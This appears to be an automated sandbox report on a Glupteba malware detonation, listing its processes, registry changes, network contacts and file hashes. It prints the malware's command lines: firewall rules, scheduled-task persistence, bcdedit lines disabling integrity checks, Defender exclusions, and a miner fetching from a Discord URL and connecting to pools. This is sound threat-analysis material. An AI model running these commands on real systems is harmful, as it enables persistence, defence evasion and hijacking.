| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (certificate blob omitted) | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe
"C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240509223218.log C:\Windows\Logs\CBS\CbsPersist_20240509223218.cab
C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe
"C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 9860bae9-c6b4-49dc-929d-f0a5c795ebe8.uuid.localstats.org | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 131.253.33.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | server5.localstats.org | udp |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| BG | 185.82.216.111:443 | server5.localstats.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 74.125.250.129:19302 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| BG | 185.82.216.111:443 | server5.localstats.org | tcp |
| N/A | 127.0.0.1:31465 | N/A | tcp |
| BG | 185.82.216.111:443 | server5.localstats.org | tcp |
| BG | 185.82.216.111:443 | server5.localstats.org | tcp |
| N/A | 127.0.0.1:31465 | N/A | tcp |
| BG | 185.82.216.111:443 | server5.localstats.org | tcp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
Files
memory/1756-0-0x00000000042E0000-0x00000000046D8000-memory.dmp
memory/1756-1-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1756-2-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1756-3-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1756-5-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2956-6-0x0000000004210000-0x0000000004608000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 02a79bce334d75092e310e6a574a2b77 |
| SHA1 | 96fb763797665e42fa509f77f4ed9bbf090ae234 |
| SHA256 | 046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27 |
| SHA512 | 4bb426d59219b1b1f1e6dd5c9a09c62330e4bdddc4edb349d625d5219146c42949fdd4128999acd9b9ded7f42afad828f43d49f8e237bc39ebad4dd592761173 |
memory/2956-15-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-16-0x00000000042A0000-0x0000000004698000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
memory/1676-23-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/1676-37-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\AppData\Local\Temp\Cab44B0.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar45D0.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
memory/2480-111-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
memory/2480-140-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
memory/1732-144-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2512-147-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/1732-148-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2480-149-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2512-151-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2480-150-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-152-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2512-154-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2480-155-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-156-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-158-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2512-161-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2480-160-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-163-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-164-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-166-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-169-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-171-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-172-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-174-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-177-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-178-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-180-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-182-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-185-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-186-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-188-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-191-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-193-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-194-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-196-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-199-0x0000000000400000-0x0000000002957000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
| MD5 | dcb505dc2b9d8aac05f4ca0727f5eadb |
| SHA1 | 4f633edb62de05f3d7c241c8bc19c1e0be7ced75 |
| SHA256 | 61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551 |
| SHA512 | 31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3 |
memory/2480-211-0x000000002F320000-0x000000002F801000-memory.dmp
memory/2260-212-0x0000000000400000-0x00000000008E1000-memory.dmp
memory/2480-210-0x000000002F320000-0x000000002F801000-memory.dmp
memory/2480-207-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
| MD5 | 713674d5e968cbe2102394be0b2bae6f |
| SHA1 | 90ac9bd8e61b2815feb3599494883526665cb81e |
| SHA256 | f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057 |
| SHA512 | e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb |
memory/2480-221-0x000000002F320000-0x000000002FBED000-memory.dmp
memory/2260-224-0x0000000000400000-0x00000000008E1000-memory.dmp
memory/2480-223-0x000000002F320000-0x000000002FBED000-memory.dmp
memory/780-225-0x0000000000830000-0x00000000010FD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
| MD5 | 1bf850b4d9587c1017a75a47680584c4 |
| SHA1 | 75cd4738ffc07f203c3f3356bc946fdd0bcdbe19 |
| SHA256 | ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955 |
| SHA512 | ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-09 22:32
Reported
2024-05-09 22:37
Platform
win10-20240404-en
Max time kernel
299s
Max time network
301s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
